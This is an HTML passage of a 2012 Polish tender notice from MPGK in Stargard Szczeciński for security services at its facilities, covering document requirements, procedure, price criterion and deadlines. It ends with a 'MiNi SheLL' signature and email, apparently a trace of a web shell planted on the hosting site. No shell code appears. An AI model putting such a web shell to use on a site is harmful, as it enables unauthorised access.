<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Protokólarne przekazanie obiektów  dla  usługi (Świadczenie usługi kompleksowej ochrony obiektów należących do Miejskiego Przedsiębiorstwa Gospodarki Komunalnej w Stargardzie Szczecińskim Sp. z o.o.), odbędzie się w terminie wskazanym przez Zamawiającego do 3 miesięcy od daty podpisania umowy.
2. Ustalony w ust.1. termin, może ulec zmianie w przypadku nie wywiązania się przez Zamawiającego z obowiązków określonych umową, zmiany zakresu prac oraz okoliczności niezależnych od Wykonawcy i  lub Zamawiającego, nieznanych w dniu zawarcia umowy np. wydłużenie terminu oczekiwania na zgody, decyzje- wydawane przez Organy Państwowe, dla realizacji zgodnego z przepisami prawa usługi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpgk.stargard.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Gospodarki Komunalnej Spółka z o.0.: ul. Stefana Okrzei 6; 73-110 Stargard Szczeciński, Dział Zaopatrzenia, cena 30 zł brutto (nie dotyczy planu ochrony)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2012 godzina 14:00, miejsce: Miejskie Przedsiębiorstwo Gospodarki Komunalnej Spółka z o.o.: ul. Stefana Okrzei 6; 73-110 Stargard Szczeciński, sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com